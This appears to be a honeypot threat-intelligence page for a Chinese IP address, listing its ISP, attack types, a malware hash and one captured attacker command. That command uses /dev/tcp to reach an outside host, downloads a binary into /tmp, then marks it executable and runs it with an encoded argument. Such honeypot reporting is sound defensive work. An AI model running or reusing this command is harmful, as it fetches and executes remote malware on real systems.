Active Threat • LOW

111.228.0.112

Country of Origin🇨🇳 China

First Detection12/31/2025

Last Activity12/31/2025

ISPChina Telecom Beijing Tianjin Hebei Big Data Industry Park Branch

🎯

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇨🇳 China
City: Unknown
ASN: AS141679
ISP: China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch

Attack Types

cowrie

redishoneypot

Attacked Ports

637922

Associated Malware

398d657ca8a3f829cd16...→

Executed Commands

nohup bash -c "exec 6<>/dev/tcp/23.249.28.118/60132 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/nl0gslHvJm && chmod +x /tmp/nl0gslHvJm && /tmp/nl0gslHvJm pi7LmvSMZaFeT0pCt2CH8ITCOtPLP8WM6IxjtkJLTV+hZoX8gsM/39kuwob/k2O7WFRLVL98j/COxT7a2znThvWTYLtVVEhUoWOM/o7FPtrYPNOF94l8vV1PVF22YZP3hsk429o8x5T3jGOhXkhCQr98jPeGyTjb2jzHlPSOfL1YQ1Ret3yM94zJONvaPcGU94xmoV5LT0K+a47ohcE03ds/wYDmjGK8QkhPXqFjj/Gawj/f0TjDhfWJ9cNJ/8lDpeLmxL6Kbff+D0u6zR4OGg==" &

Risk Assessment

/100

LowMediumHighCritical